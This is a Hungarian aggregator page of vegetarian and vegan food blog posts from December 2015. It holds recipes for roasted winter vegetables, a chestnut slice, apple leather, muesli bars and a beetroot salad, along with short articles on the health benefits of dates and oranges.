Ami pedig a Zizi módot jelenti: hozzádobok héjastul fokhagymát és egy-két darab citromot gerezdekre vágva. Ha a fokhagymát a héjában sütjük, akkor nem ég feketére, hanem finom puha, édes lesz, a héjából kinyomva azonnal fogyaszthatjuk, de akár plusz öntetet készítve a zöldségekhez felhasználhatjuk az öntet ízesítésére (pl. valamilyen joghurtos tahinis szószba beletehetnénk miután villával pépesre törtük). A citrom enyhén karamellizálódik a sütés során és hihetetlen finom szaftot képez az olívaolajjal és fűszerekkel a zöldségek mellé. Ez is felhasználható öntet készítéséhez, de mi leggyakrabban csak megesszük a citrom sült, enyhén savanykás húsát a zöldségek mellé.
Szóval, ha hamarabb nem, de karácsonyra feltétlenül süssetek egy nagy tepsi, színes zöldség kavalkádot. Imádni fogja a család apraja-nagyja!
Tepsiben sült téli zöldségek Zizi módra (vegán)
Hozzávalók 4 főre:
– 2 db közepes répa, meghámozva
– 2 db közepes édesburgonya, meghámozva
– 6 db nagyobb sütni való burgonya (én héjastul sütöm, de meghámozható, ha valaki úgy jobban szereti)
– 12 db kisebb lila burgonya (én héjastul sütöm, de meghámozható, ha valaki úgy jobban szereti)
– 2 db közepes lilhagyma, meghámozva
– 8-10 gerezd fokhagyma, héjastul
– 1/4 fej brokkoli, rózsáira szedve (kb. egy 500 grammosnak a negyede)
– 1 db nagy citrom
– szárított kakukkfű, rozmaring
– só, bors
– extra szűz olívaolaj (jó minőségű!)
A sütőt melegítsük elő 180C fokra. Egy nagy tepsit béleljünk ki sütőpapírral.
A megmosott, meghámozott zöldségeket vágjuk egyenlő nagyságú kockákra, falatokra (sütési idő szempontjából fontos, hogy nagyjából egyforma méretűek legyenek)! Dobjuk a felkockázott zöldségeket, a brokkolit, a fokhagyma gerezdeket és a citrom gerezdeket a tepsibe. Sózzuk, borsozzuk és fűszerezzük kakukkfűvel és rozmaringgal. Locsoljuk meg olívaolajjal (kb. 50-70 ml) és jól keverjük át. Öntsünk rá egy kevés vizet (kb. 50-70 ml), ez segíti a zöldségek puhulását a sülés során.
Tegyük a sütőbe és süssük kb. 35-40 percig, amíg a zöldségek megpuhulnak és enyhén megbarnulnak. A sütési idő felénél, keverjük át a zöldségeket, hogy minden oldalukon jól megpiruljanak.
Gesztenyés szelet maglisztes puha piskótával (gluténmentes, laktózmentes)
2015. december 14. Zöld Avocado
Valamikor régen vettem egy zacskó szőlőmaglisztet, mert valahol azt olvastam, hogy milyen egészséges a szőlőmag, mely leghatékonyabban őrlemény formájában fejti ki hatását. Miután megérkezett a webáruházból (ahonnan rendelni szoktam a kissé rendhagyó, de mégis egyszerűen elérhető alapanyagokat), feltettem a polcra a többi liszt közé. El is felejtkeztem róla hosszú időre... Magányosan bujdokolt a konyhaszekrény hátsó sarkában, várva, hogy beteljesítse küldetését. Nem is olyan régen, egy leltározás alkalmával rábukkantam a még bontatlan zacskóra. Mivel közel volt a szavatossági idő vége, ezért külön figyelmet fordítottam a konyhámban bujkáló szőlőmaglisztre. Nem egy hétköznapi hozzávaló, amit sok receptben fel tudunk használni! Célirányos és tudatos hozzáállás szükségeltetik a szőlőmagliszthez, ha ízletesen szeretnénk elkészíteni. gesztenyés szelet maglisztes puha piskótával (gluténmentes, laktózmentes) A szőlőmagliszt ad egy érdekes állagot a süteményeknek, amitől olyan roszogó érzést érezhetünk a szánkban. Ezért én úgy gondoltam, hogy el kell terelni a figyelmet róla, egy erőteljes, és hangsúlyos krémmel. Késő őszi, kora téli hónapokat taposva, mi is lehetne tökéletesebb alapanyag a krémhez, mint a gesztenye? A gesztenye, amit sülve - főve, krémekben és önmagában is imádunk! Európa utcáit járva ebben az időszakban gyakran botlunk sült gesztenye árusokba, akik illat- és íz élményeikkel, egy kis melegséget lopnak a járókelők életébe. A hangulatos karácsonyi vásárok forraltboros házikói mellett is gyakran nassolhatunk pár szem sült gesztenyét. Sajnos nem tartozik az olcsó csipegetni valók közé, de évente csak pár alkalommal van lehetőségünk átadni magunkat ennek az élvezetnek, így hát nem érdemes sokat gondolkozni rajta. ;-) szelídgesztenye "A gesztenye élettani szerepe jelentős. Erős antioxidáns hatású, gazdag E-vitaminban, B1-, B2-, B6 és C-vitaminban, és cukor nélkül fogyasztva az egészséges táplálkozás egyik alappillére. Gazdag nátriumban, kalciumban, foszforban és káliumban. Mivel magas a szénhidráttartalma, ezért a gabona- és burgonyapótló, hisz gazdag rostokban, valamint jó hatással van az emésztésre." Forrás: Filantropicum Többszöri kísérletezés eredménye lett ez a rendkívül finom gesztenyés szelet, ami olyan nagy kedvenc lett, hogy még itt sincs a karácsony, de már többször elkészült, majd elfogyott, elkészült, majd újra elfogyott ez a karácsonyi menübe szánt sütemény. Egyszerű, különleges, mennyein puha, finom, magas rost- és antioxidáns tartalmú, tehát még egészséges is! ;-) Nem vagyunk édesszájúak, általában 1-1 falat elég, hogy az édes íz utáni vágyunkat kielégítsük, de ezt a süteményt nem tudom elfelejteni, sem abbahagyni. A testem is örül az effajta nassolásnak! ;-) gesztenyés szelet maglisztes puha piskótával (gluténmentes, laktózmentes) HOZZÁVALÓK (kb. 20x34cm téglalap) Szőlőmaglisztes piskótatésztához: - 6 db bio tojás - késhegynyi szódabikarbóna - 4 ek mandulaliszt (darált mandula) - 3 ek szőlőmagliszt - 4 ek tetszés szerinti édesítő (pl.: nyírfacukor, eritrit, kókuszcukor, nádcukor stb.) - csipet Himalája só Gesztenyés krémhez: - 500 g szelídgesztenye - 8 ek tetszés szerinti édesítőszirup (pl.: Agave-, datolya-, maple- szirup, méz stb.) - 4 ek kókusz reszelék - 3 dl kókusz tej (konzerves) - 1 ek útifűmaghéj - 1 dl rum vagy 1 ek rum aroma (elhagyható) Csokimázhoz (elhagyható): - 2 ek kókuszolaj - 50 g magas minőségű bio étcsokoládé (GM és LM) gesztenyés szelet maglisztes puha piskótával (gluténmentes, laktózmentes) ELKÉSZÍTÉSA gesztenyékre vágunk egy-egy csíkot, vagy X-et, és vízzel teli fedeles edényben feltesszük főzni. Kb. 40 perc alatt készre főzzük a gesztenyéket. Addig könnyű őket megpucolni, míg melegek, úgyhogy nem öntjük le róla a vizet, csak kimerünk egy-egy szűrőkanállal egy-egy adag főtt gesztenyét pucolni. Amikor végeztünk egy adaggal, kimerünk egy újabbat, és így tovább. A végén, amikor már minden gesztenyét megpucoltunk, boldogan félre tehetjük őket, és pihenhetünk egy keveset. A szőlőmaglisztes piskótához a tojások fehérjét külön választjuk a sárgájuktól. A tojásfehérjéket egy csipet sóval kemény habbá verjük. (Akkor elég kemény, ha fejjel lefelé tudjuk fordítani a keverő tálat, és a hab nem esik ki belőle. Azért csak óvatosan teszteljük! ;-) ) A tojássárgákat összekeverjük a szódabikarbónával, a szőlőmagliszttel, a mandulliszttel és a választott édesítővel (porrá darálva). Ezt a lisztes keveréket óvatosan a kemény fehérjehabhoz adagoljuk. Nagy körkörös le-fel mozdulatokkal keverjük össze őket, hogy ne törjük szét a habot teljesen. Miután egynemű piskótatésztát kaptunk 180°C-ra előmelegített sütőbe tesszük. Válasszunk egy nagy tepsit (nálam ez 40x36 cm volt), melybe sütőpapírt helyezünk, és arra öntsük rá a szőlőmagos piskótatésztát. Kb. 20 perc alatt készre sül a tészta. Vegyük ki, borítsuk a megsült piskótát fejjel lefelé a tepsibe, és óvatosan húzzuk le még melegen a sütőpapírt a tésztáról, majd hagyjuk kihűlni a piskóta tésztát. gesztenyés szelet maglisztes puha piskótával (gluténmentes, laktózmentes) A gesztenyekrémhez a megfőzött és megpucolt gesztenyét daráljuk vagy reszeljük le (törjük össze), majd a kókusztejjel, a választott édesítősziruppal, a rummal, a kókuszreszelékkel keverjük egynemű krémmé. (Ha a turmix vagy aprítógépünk elbírja, akkor tegyünk mindent egybe bele, és dolgoztassuk össze a géppel.) Miután kész a gesztenyés krém, keverjünk hozzá egy evőkanál útifűmaghéjat, és hagyjuk 15 percet pihenni. A kihűlt piskótatésztát vágjuk egyszerűen két felé, mert egy a süti alja, egy pedig a teteje lesz. (Ne úgy mint a tortát, magasságában, mert ahhoz lapos, hanem, egyszerűen vágjuk ketté a tésztát. Két db. kb. 20x34 cm-es téglalapot kapunk.) Kenjük meg vastagon a krémmel az egyik felét, helyezzük rá a másik felét a piskótának, majd készítsünk a tetejére csokimázat. A csokimázhoz az étcsokoládét gőz felett olvasszuk fel, keverjünk hozzá két evőkanál kókuszolajat, majd még melegen kenjük a sütemény tetejére. Tegyük a hűtőbe az egészet éjszakára, és másnap már fogyaszthatjuk is ezt a különleges, és ízletes süteményt, melyet ételérzékeny vendégeink (glutén, laktóz) is bátran megkóstolhatnak. gesztenyés szelet maglisztes puha piskótával (gluténmentes, laktózmentes) Zöld Avocado vegetáriánus gasztroblog, ahol táplálkozunk is nem csak eszünk! Megjegyzés1: Ha a gesztenyéket hideg vízbe tesszük főzés/sütés előtt, könnyedén kiszedhetjük közülük a már romlottakat, amiket a kukacok megdézsmáltak. Azok, amelyek feljönnek a víz tetejére, lebegnek az ürességtől, azokat nyugodtan dobjuk ki még főzés/sütés előtt. Megjegyzés2: A szőlőmaglisztet nem csak belsőleg, de külsőleg is érdemes rendszeresen fogyasztani és használni. Itt bővebben olvashatunk előnyös tulajdonságairól, és arcpakolásként való felhasználásáról. gesztenyés szelet maglisztes puha piskótával (gluténmentes, laktózmentes)
Almalap, az egészséges "gumicukor"
2015. december 11. Éltető ételek
A nyers desszertek elengedhetetlen hozzávalója az aszalt almalap. Érdemes beruházni egy jó aszalóra, mivel nyáron finomabbnál finomabb aszalványokat, szezonon kívül pedig édes és sós krékereket, sütiket készíthetünk. A karácsony elengedhetetlen zserbója és bejglije is készülhet almalapból. De készíthetünk belőle palacsintát, mákos tésztát is. Természetesen nemcsak almalapból készíthetünk ilyen finomságokat, hanem idényszerűen más gyümölcsből is. Ha az aszalás során megszórjuk különböző magokkal, csírákkal, igazán finom és egészséges müzlilap lesz belőle. Hozzávalók (33x33 cm-es tálcához): 60 dkg gyümölcs (általában alma+1 banán) Elkészítése: Az almát hámozzuk meg, majd a banánnal együtt turmixoljuk simára. Ne adjunk hozzá vizet, késes darabolóval csináljuk (vagy botmixerrel).Ezután terítsük ki az aszalógép tapadásmentes tálcájára, majd kezdetben 70-80 fokon, majd 2-3 óra elteltével 50 fokon szárítsuk úgy 6-7 órát. Ezután vegyük vissza a hőmérsékletet 40-45 fokra, és aszaljuk készre. Összesen 12-14 óra alatt szárad ki az almalap. A szárítás végefele figyeljünk oda, nehogy túlszáradjon, mert akkor törni fog. Nem mintha ez gond lenne, csak akkor nem lehet tekerni a lapot, pl. bejglihez.Hűtés nélkül is sokáig eláll, de érdemes hűtőbe tenni, hogy nehogy lakói legyenek a molylepkék. :) Amennyiben nem tudod magadnak elkészíteni, akkor személyes átvétellel, vagy postai úton lehet rendelni. Ára: 900 Ft/ 1 tálca lap (vagy 4 részre vágva) Aszalással készül, így az enzimek sértetlenek maradnak. Élő - nyers - vegán - gluténmentes Hozzáadott cukrot, édesítőszert NEM tartalmaz!
A datolya hatásai
2015. december 10. Élj harmóniában
DatolyaA datolya (az én egyik kedvencem), már az időszámítás előtti időkben is nagy népszerűségnek örvendett. Az egyik legősibb és az egyik legjobb egészségre gyakorolt hatású gyümölcs. Szerencsére friss és szárított változatban, szinte hasonló tápértékkel rendelkezik. Magas az ásványi anyag és nyomelem és vitamin tartalma. Sok káliumot, vasat, nátriumot, foszfort, A, B, C és D vitamint tartalmaz. A szervezetet kitűnő energiával látja el, jól lehet hasznosítani sportolásnál, kimerültségnél vagy ha csak nagyon álmosnak érzed magad. Javítja az erőnlétet, állóképességet. Nagyon jó idegkimerültségnél és legyengült állapotban is, roborálja a szervezetet. Nyugodt alvást biztosít, mert szerotonin termelést okoz. Magas rosttartalmának köszönhetően, serkenti az emésztést, helyreállítja a bélmozgást, megszünteti a székrekedést. Nagyon magas a vastartalma és C vitamint is tartalmaz, így vérszegénység esetén kiváló terápia a rendszeres datolyafogyasztás. A datolya egészségesen tartja a szívet és segít a koleszterin szint csökkentésében is. A datolya az egyik legédesebb gyümölcs, ezért használják szárítva ledarálva - datolya cukorként ételek ízesítésére, édességek elkészítésére. A blogon elég sok receptben láthattátok. Én minden nap lefekvés előtt elfogyasztok néhány beáztatott datolyát:) Vegyszermentes (bio) datolyát egyél :) Néhány datolyával készült recept a blogról: http://eljharmoniaban.blogspot.hu/2015/08/kokuszos-datolyagolyo-egeszseges.html http://eljharmoniaban.blogspot.hu/2015/06/hazi-keszitesu-egyszeru-cukormentes.html http://eljharmoniaban.blogspot.hu/2015/12/glutenmentes-laktozmentes-cukormentes.html
Lét-tudatos Hírlevél - december
2015. december 8. Lét-tudatos konyha
I. RECEPTEK: ünnepi ételek II. KIADVÁNY: Készítsd el a karácsonyi menüt reformosan! Hagyományos ízek egészségesen - megtalálod a Téli immunerősítés receptekkel című kiadványomban. III. AJÁNDÉKOZZ EGÉSZSÉGET!: Egészséget támogató hasznos szolgáltatás Karácsonyra - AJÁNDÉKUTALVÁNYOK IV. ÉLETMÓD: Nyaki kopás, szédülés, zsibbadás - van megoldás? Igen! - A speciális jógagyakorlatok segítenek! JÓGA: Szeretettel várlak jógatermi foglalkozásaimon Szegeden V. SORSELEMZÉS TAROT kártyával: December - a számvetés hava. Mit hoz a jövő év? Összegzés, értékelés Tarot kártyával Hírlevélre feliratkozás: a www.lettudatos.com belső oldalain
Korvapuusti
A név egy finn adventi édességet takar, amellyel itt (http://hogymegtudjuknezni.blogspot.hu) találkoztam néhány évvel ezelőtt. A recept is az oldalról származik, csupán a mennyiségeket vettem kisebbre, illetve élesztő helyett kovásszal készült. Érdemes nézelődni Márti oldalán, vegetáriánusként is...
Aszaltgyümölcsös müzliszelet
2015. december 6. Éltető ételek
Újabb felvonása érkezett el a müzligyártásnak. Ez volt a kiindulási recept, bár nem volt itthon mogyoró és kókuszreszelék sem. Az arányokon is változtattam, kevesebb édesítőszer került bele. Jól összeállt, finom lett... holnap ez kerül az uzsonnás dobozba. :) Hozzávalók: - 7 dkg aprószemű zabpehely - 7 dkg nagyszemű zabpehely - 2 evőkanál szezámmag - 7 dkg napraforgó - 7 dkg dió durvára törve - 9 dkg méz - 4 dkg kókuszvirágcukor - 5 dkg kakaóvaj - 6 csepp narancsolaj - 3 dkg aszalt áfonya - 3 dkg arany mazsola Elkészítése: - A zabpelyheket és az olajos magokat tegyük be egy tepsibe, és 170 fokon pirítsuk meg. Gyakran kevergessük, nehogy megégjen. Amikor már kezd illatozni, akkor már jó. - A mézet, a kókuszvirágcukrot és a kakaóvajat kis tűzön olvasszuk össze. A kókuszvirágcukor is olvadjon fel teljesen. - A pirított magos zabot öntsük a mézes masszához. Cseppentsük bele a narancsolajat és a pici darabokra vágott aszalványokat is adjuk hozzá. - Jól keverjük össze. - Egy 20x10 cm-es tepsibe tegyünk zsírpapírt, és jól nyomkodjuk bele a masszát. Még melegen csináld (de vigyázz, hogy ne süsse meg a kezedet). Jó alaposan tömöríteni kell, különben nem lesz szeletelhető. - Hagyjuk teljesen kihűlni, majd szépen szeletelhető lesz,
téli vitaminsaláta - Sült cékla és sütőtök, pirított kelbimbóval narancsosan (gluténmentes, laktózmentes, tojásmentes, vegán)
2015. december 4. Zöld Avocado
téli vitaminsaláta - Sült cékla és sütőtök, pirított kelbimbóval narancsosan (mindenmentes, vegán) A média telis tele van jobbnál jobb karácsonyi étel és sütemény recept ötletekkel. Személy szerint valahogy nem érzek rá késztetést, hogy előre gyártsak karácsonyi ételeket... Nálam az ünnepi ételek az ünnepnapokon készülnek el, és azt sem tudom garantálni, hogy közben fotózásra is kerítek sort, miközben a szeretteimmel élvezzük a Karácsony melegét és ízeit. Így azoknak, akik már alig várják a karácsonyi recepteket a Zöld Avocado vegetáriánus gasztroblogon, csalódást fogok okozni, mert nem ígérhetek ünnepi recept dömpinget! Egy - két korábbi recept a tavalyi évből, az idén is jól jöhet. Pl.: tápláló krémlevesnek egy mandarinos-gyömbéres sárgarépa vagy egy klasszikus brokkoli , diósült vagy tofus fasírtgolyók hús helyett, reform aranygaluska és narancsos kuglóf az édes ízek kedvelőinek, túrós kakaós zabpalacsinta "havas fenyők" mintájára formázva, a kihagyhatatlan vendégváró muffinok, vagy egy könnyed desszert a nehéz lakoma után, nyers mákos tekercsként. Azonban az ünnepekig is enni kell valami táplálót és gyorsan elkészíthetőt. Valami egészségeset, ami feltölt minket energiával, biztosítja a szükséges tápanyagokat, a tél ellenére szép, színes és szemet gyönyörködtető, ízletes, és elkészítése közben van időnk egy-egy ajándék becsomagolására, mert nem igényel túl sok őrizetet a tűzhely mellett állva. Fogadjátok hát sok szeretettel az egyik kedvenc téli vitaminsalátámat, mely eddig az egyetlen étel, amiben hajlandó vagyok a kelbimbót elfogyasztani! ;-) téli vitaminsaláta - Sült cékla és sütőtök, pirított kelbimbóval narancsosan (mindenmentes, vegán) Tudom, hogy rendkívül egészséges téli káposztaféle, mégis ezidáig nem sikerült olyan recepttel találkoznom, ami elnyerte volna a tetszésemet. Hosszasan töprengtem rajta, milyen egyéb hozzávalók kíséretében tehetném a kelbimbót fogyaszthatóvá egy ételben. Végül megszületett ez a színes, és vitaminban gazdag saláta, ami főételnek is megfelelő jóllakottság érzést biztosít, és nem csak, hogy ehetővé teszi a kelbimbót, de még rendkívül finom is! :-) Én magam is nehezen akartam elhinni, hogy ennyire ízlik! Adjatok neki egy esélyt, és próbáljátok ki, illetve kóstoltassátok meg a kelbimbót "nem kedvelő" családtagokkal is! ;-) "A kelbimbó igen gazdag vitaminokban. Tartalmaz A-, B-, K-, E- és C-vitamint, valamint élelmi rostokat, kalciumot, magnéziumot és vasat. Rosttartalmának köszönhetően jó hatással van a belekre, illetve segíti az emésztést. Erősíti a szervezetet, és fokozza annak ellenálló képességét. Káliumtartalma miatt kiváló vízhajtó hatással rendelkezik. A kelbimbó csökkenti a koleszterinszintet, legjobban nyersen fogyasztva fejti ki hatását, de párolva is megőrzi ezt a tulajdonságát. Kiváló omega-3 zsírsav-forrás, melynek köszönhetően a vérnyomás csökkentésében is hasznos lehet. Fitotápanyag-tartalmának köszönhetően rákvédő anyagokat tartalmaz, melynek következtében csökkenti a különböző daganatos megbetegedések kialakulását szervezetünkben. Jó hatással van a pajzsmirigyműködésre is. Terhes nőknek fogyasztása kifejezetten ajánlott, hiszen magas folsav - és kalciumtartalommal rendelkezik." Forrás : Házipatika téli vitaminsaláta - Sült cékla és sütőtök, pirított kelbimbóval narancsosan (mindenmentes, vegán) H OZZÁVALÓK (kb.3 személyre) - 500 g friss kelbimbó - 2 db közepes méretű nyers cékla - kb. 500 g sütőtök - 2 ek extra szűz olívaolaj (vagy kókuszolaj) - egy pohár tiszta víz (2 dl) - 1 ek balzsamecet - 2 ek világos szójaszósz (legyen gluténmentes) - 1 ek agave szirup (vagy egyéb tetszés szerinti édesítő szirup) - Himalája só, frissen őrölt fekete bors - 1 db narancs frissen facsart leve - 2 marék pisztácia (elhagyható) téli vitaminsaláta - Sült cékla és sütőtök, pirított kelbimbóval narancsosan (mindenmentes, vegán) ELKÉSZÍTÉSA sütőtököt meghámozzuk, kimagozzuk, és kockacukor méretű kockákra vágjuk, majd egy sütőpapírra tesszük. A céklákat is meghámozzuk (használjunk eldobható kesztyűt hozzá), és négy részre vágjuk, majd egy-egy alufóliából készült batyuba helyezzük a két db felvágott céklát külön-külön. A batyuk teteje legyen nyitható, és tegyünk a batyuk aljába 2-2 ek vizet, hogy abban tudjon párolódni a cékla. Az alufólia batyu tetejét zárjuk össze, és helyezzük a sütőpapírra a sütőtök kockák mellé. batyuban sült cékla 200 °C fokra előmelegített sütőben kezdjük el sütni őket. A sütőtökök kb. 30-35 perc alatt puhára, és aranybarnára sülnek. Ekkor vegyük őket ki, és csak az alufóliába helyezett céklákat tegyük vissza. A cékla méretétől függően még kb. 20-30 percre lesz szükségük a cékláknak, hogy megpuhuljanak. Teszteljük egy villával. Miután elkészült a cékla is, hagyjuk kihűlni, és vágjuk tetszés szerinti méretű kockákra. pirított kelbimbó Közben egy WOK-ban, vagy egy serpenyőben kevés olajon lepirítjuk a felvágott (két-három részre) kelbimbókat a vágott oldaluknál fogva. Pár perc alatt megpirulnak. Ekkor felöntjük egy pohár vízzel, sózzuk, borsozzuk, és fedő alatt, közepes lángon pároljuk további 5 percig. Levesszük a fedőt, hozzáadjuk a felkockázott és elősütött céklákat, illetve egy előre kikevert szószt. (1 ek balzsam ecet, 2 ek szójaszósz, és 1 ek agave szirup). Az egészet összekeverjük a fakanállal, majd addig főzzük, míg el nem fő az összes lé a serpenyő aljáról. (Min.3 perc.) Miután elkészült, elzárjuk alatta a tűzhelyet, és meglocsoljuk egy frissen facsart narancs levével az egészet. (Ez a művelet elhagyható, de nagyon finom aromát kölcsönöz az ételnek). Tálaláskor megszórjuk pisztáciával. téli vitaminsaláta - Sült cékla és sütőtök, pirított kelbimbóval narancsosan (mindenmentes, vegán) Tápanyagban gazdag, ízletes és melengető kelbimbó fogyasztást kívánunk! :-) Megjegyzés1: Ha épp nincs sütőtök a közelünkben, akkor használjunk helyette édes burgonyát, de akár nyers almával is el tudom képzelni. Mindkettővel ugyanolyan finom lesz a végeredmény. Megjegyzés2: Ez a recept megjelent a 108.hu online magazin 56. számában is, ahol egyéb karácsonyi receptek mellett, különböző karácsonyi ötletekhez, tippekhez juthattok hozzá. téli vitaminsaláta - Sült cékla és sütőtök, pirított kelbimbóval narancsosan (mindenmentes, vegán)
Banános rolád
Ezekhez a nyers édességekhez mindig a guszta, sült társai adják az ötletet ;) Így volt ez most is, rengeteg szépséges, de nem túl egészséges süti kering a neten, és amelyik a legjobban tetszik, elkészítem nyers változatban is ;) Hozzávalók az alaphoz: 1 csésze áztatott dió 1 csésze áztatott szotyi 8 szem áztatott datolya 1 csipet vanília […]
Alap csokoládé kurzus Szántó Tibornál
2015. december 1. Zizi kalandjai
Ez a doboz várt az érkezéskor… meg egy pohár krémes, forró csokoládé. Jó a kezdés, gondoltam. Aztán bele is vágtunk a közepébe. Megtudtunk néhány nagyon hasznos információt a kakaóról, mint például, hogy őshazája Közép- és Dél-Amerika, meg azt is, hogy a kakaó gyümölcs (finom a gyümölcshúsa, ami licsire és ananászra emlékeztet – Tibor elmondása szerint) és a héját kivéve minden része felhasználható. Szimbiózisban él más fákkal (például kókuszpálmával vagy banánfával – ezek az oltalmazó fák), mert nagyon kényes növény.
Ahogy haladtunk a különböző kakaófajták megismerkedésével (forastero, arriva/bacional, criollo, trinitario) úgy kóstoltuk sorban a doboz tartalmát. Mindenből egy keveset… persze, aki akarta, az megehette az összeset, de higgyétek el, kakaóból és csokoládéból is van olyan, hogy elég.
A legjobb minőségű kakaók Venezuelából, Ecuadorból, Santo Domingoból, Sao Toméról és Madagaszkárról kerülnek ki. Ezenkívül van még kakaó Mexikóban, Peruban, a tömegtermelés nagy részét pedig Elefántcsontpart, Ghána és Vietnám látja el.
Mik is készülnek kakaóból?
Bevonómassza: alacsony a kakaótartalma, nincsen benne kakaóvaj – helyette hidrogénezett növényi zsír kerül bele, valamint szintetikus vanília, rengeteg benne a cukor, a kakaót alkalmanként karobporral helyettesítik. Gondoljatok ezekre az információkra, amikor a közelgő Mikulás alkalmából egy “csoki” Mikulást emeltek le valamelyik szupermarket polcáról!
Étcsokoládé: kakaómassza és vaj, valamint Bourbon vanília van benne, édesítésére többnyire nádcukrot használnak, kakaótartalma 60 és 100% között van.
Tejcsokoládé: tejpor, (nád)cukor, vanília van benne, kakaótartalma 29 és 40% között van.
Fehércsokoládé: alapja a kakaóvaj, van benne (nád)cukor, vanília, szójalecitin és tejpor.
Tibor tudása fantasztikus, szakterülete a területszelektált csokoládék és kakaóbabok… és tényleg mindent tud a kakaóról. Alap kurzusán kívül, tart haladót is, amely négy részből áll és minden csokoládét kedvelőnek (aka Gombócartúrnak :)) szól. Aki pedig a kóstoló doboz tartalmát kevésnek tartja, az feltétlen menjen el a kurzusra… nem fogja tudni megenni!
Szántó Tibor csokoládé kurzus információk: alap, haladó. Ajándékutalvány is vásárolható náluk.
A kurzuson {Szántó Tibor} meghívásának köszönhetően vettem részt. A véleményem csakis a sajátom.
Vegán rakott palacsinta rizslisztből
2015. november 30. Vegán lettem
Rizslisztből készült az első saját alkotású vegán édességem. A rizsliszt állaga miatt nem tűnt elsőre túl jó választásnak, de a végeredmény egy nagyon fincsi vegán rakott palacsinta lett.
Profi szakácsoktól elnézést kérek, ez a recept egy gyors ötlettől vezérelve és a fantasztikus ízek hatása alatt íródott, így mellőz mindenféle szakmaiságot részemről. A konyhában totális amatőrnek számítok, de itt a végeredmény nagyon bejött, és úgy gondoltam megosztom azokkal, akik hasonlóan kezdő cipőben járnak mint én. Tehát, hogyan készült a vegán rakott palacsinta?
Vegán rakott palacsinta hozzávalók
Tészta:
750g rizsliszt
1,5dl kókusz főzőkrém (ez bármi mással helyettesíthető, akár növényi tejjel is)
1 csomag vaníliás cukor
50g nádcukor
20g kókuszzsír
szűrt csapvíz (édesanyám emlékeim szerint mindig bubis ásványvízzel készítette, egyszer majd kiderítem milyen különbséget okoz a végeredményben)
csipet só
Töltelék és bevonó:
házi baracklekvár
szatmári szilvalekvár
mák
dió
kakaó
kakaó bevonó
1dl rizstej
Vegán rakott palacsinta elkészítése
Először elkevertem a rizslisztet a cukorral és a kókusz főzőkrémmel. Azért használtam főzőkrémet, mivel féltem, hogy a tésztája száraz marad (franc tudja, hogy ennek a félelmemnek van-e alapja), és mert az volt itthon. Ezután felmelegítettem a kókuszzsírt és hozzákevertem a tészta alaphoz. Majd fokozatosan adtam hozzá a vizet és addig kevertem a kézimixerrel, míg a tészta olyan híg lett, hogy a sütőedényben kényelmesen körbe tudtam futtatni a merést követően.
Miközben sült az első palacsinta, előkészítettem a hőálló tálat és beletettem az első palacsintát. Nem kentem ki semmivel, csak reménykedni mertem, hogy a tésztában elég kókuszzsír van ahhoz, hogy ne égjen le. Ahogy sültek a palacsinták, úgy pakoltam bele a hőálló jénaiba és rétegeztem a tölteléket. Nálam a sorrend a következő volt: szilva lekvár, mák, barack lekvár, dió, kakaó, majd előröl. Tudatosan választottam egy nedves majd egy száraz tölteléket, hogy minden palacsintát érjen nedves töltelék. Kétszer értem körbe, majd félretettem a tele tálat. Egy tábla tortabevonót beletettem egy picike fém edénybe, ráöntöttem az 1dl rizstejet és belemártottam egy edény forrásban lévő vízbe. Azért nem közvetlenül a tűzre tettem a tortabevonót, mert ráégne az edény oldalára, így pedig csak megolvad. Az olvadt csokit ráöntöttem a vegán rakott palacsinta tetejére, majd egyenletesen eloszlattam egy kiskanállal.
Végül a 190°C-ra előmelegített sütőbe fedővel a tetején betettem a hőálló tálat és sülni hagytam a palacsintát 25 percig. 25 perc után a fedőt levettem és még 10 percig bent hagytam, hogy megpiruljon kicsit a csoki a rakott palacsinta tetején. 10 perc elteltével kivettem és hagytam hűlni, majd levágtam egy nagy szeletet, hogy megkóstoljam hogy sikerült.
Így készült nálam a vegán rakott palacsinta. Remélem minél többen kipróbáljátok, és legalább olyan élményt ad majd mint nekem. Egészségetekre!
Elkészítése: 1 óra kb.
Ha legközelebb sós palacsintára vágytok inkább, akkor próbáljátok ki a vegán brokkolis rakott palacsinta receptemet is.
Vendégbejegyzés: édesburgonya krémleves
2015. november 29. Mindennapi ételeink
Még nem is újságoltam, hogy pár hete Debrecenben főzőkört tartunk. Akit érdekel, jelezzen és elküldöm a meghívót, az évben még egy süteményes rész lesz, jövőre pedig még 5 alkalom. Többen szervezzük, ill. főzünk is, de a koordinátor Andi, aki remekül süt-főz (ugyanúgy, mint édesanyja, Marika), így megkértem, hogy osszon meg pár receptet a blog olvasóival, így most két receptet tőle osztok meg: Hozzávalók: 2-3 közepes méretű édesburgonya 1 szál póréhagyma ? 1 evőkanál olívaolaj ? 1 evőkanál "vegeta" ? kb. 1-2 kiskanál só ? 1 dl növényitejszín + egy kevés díszítéshez ? kb. 1 liter víz ? 1 marék tökmag Elkészítés: A póréhagymát felszeletelve vizes olajon egy kicsit megpároljuk. Addig az édesburgonyát meghámozzuk és feldaraboljuk, majd hozzátesszük. A sót, Vegamixet és a vizet is beletesszük az edénybe és közepes lángon puhára főzzük az édesburgonyát.
A narancs hatásai
2015. november 28. Élj harmóniában
A narancsot mostanra szerte a világon ismerik. Illata is nagyon népszerű - számos kozmetikai készítménynél, illatosításra szánt készítménynél (pl. gyertya, légfrissítők) használják. Továbbá az édességek aromájához is gyakran adják. ( A minap egy narancsos házi csokoládét készítettem itt olvashatod.) Nagyon magas a vitamin és ásványi anyag tartalma - előlegesen C vitamin, továbbá b vitaminok és folsav. Gazdag antioxidánsokban is, így a szabad gyökök közömbösítésében szerepet játszik. Kiváló étvágyjavító csemege, serkenti az emésztést. Csökkenti, normalizálja a koleszterinszintet. Magas rosttartalma miatt, a bélműködést is javítja. Kedvezően hat a tüdőkre, hörgőkre. Pl. asztmás betegségeknél segít a hörgőkben lévő váladékot eltávolítani. A narancséj szélhajtó, nyákoldó és serkentő hatású. A narancs az ájurvéda szempontjából nehezen emészthető, tápláló gyümölcs. Nehéz megemészteni is. Növeli a pitta-t és a kapha-t, de kedvezően hat a vata-ra. Kedvezően hat a szív- és érrendszerre és daganatos megbetegedéseknél is jó megelőzésnek. Segít harmonizálni a vérnyomást. Minden olyan esetben jól jöhet, amikor szükséges fokozottabb c vitamin bevitel - pl. dohányzás, alkoholfogyasztás, cukorbetegség. Lehetőleg a gyümölcsöt egészben fogyaszd - így tudod a rostoknak köszönhető kedvező hatásokat is kihasználni. A narancs tiszta minőségű aromaolaja, segít javítani a hangulatot, jó feszültségoldásra is. Vegyszermentes (bio) narancsot egyél:)
Reggelire fel! - Sütőtökös amerikai palacsinta fahéjas öntettel (laktózmentes, tojásmentes, vegán)
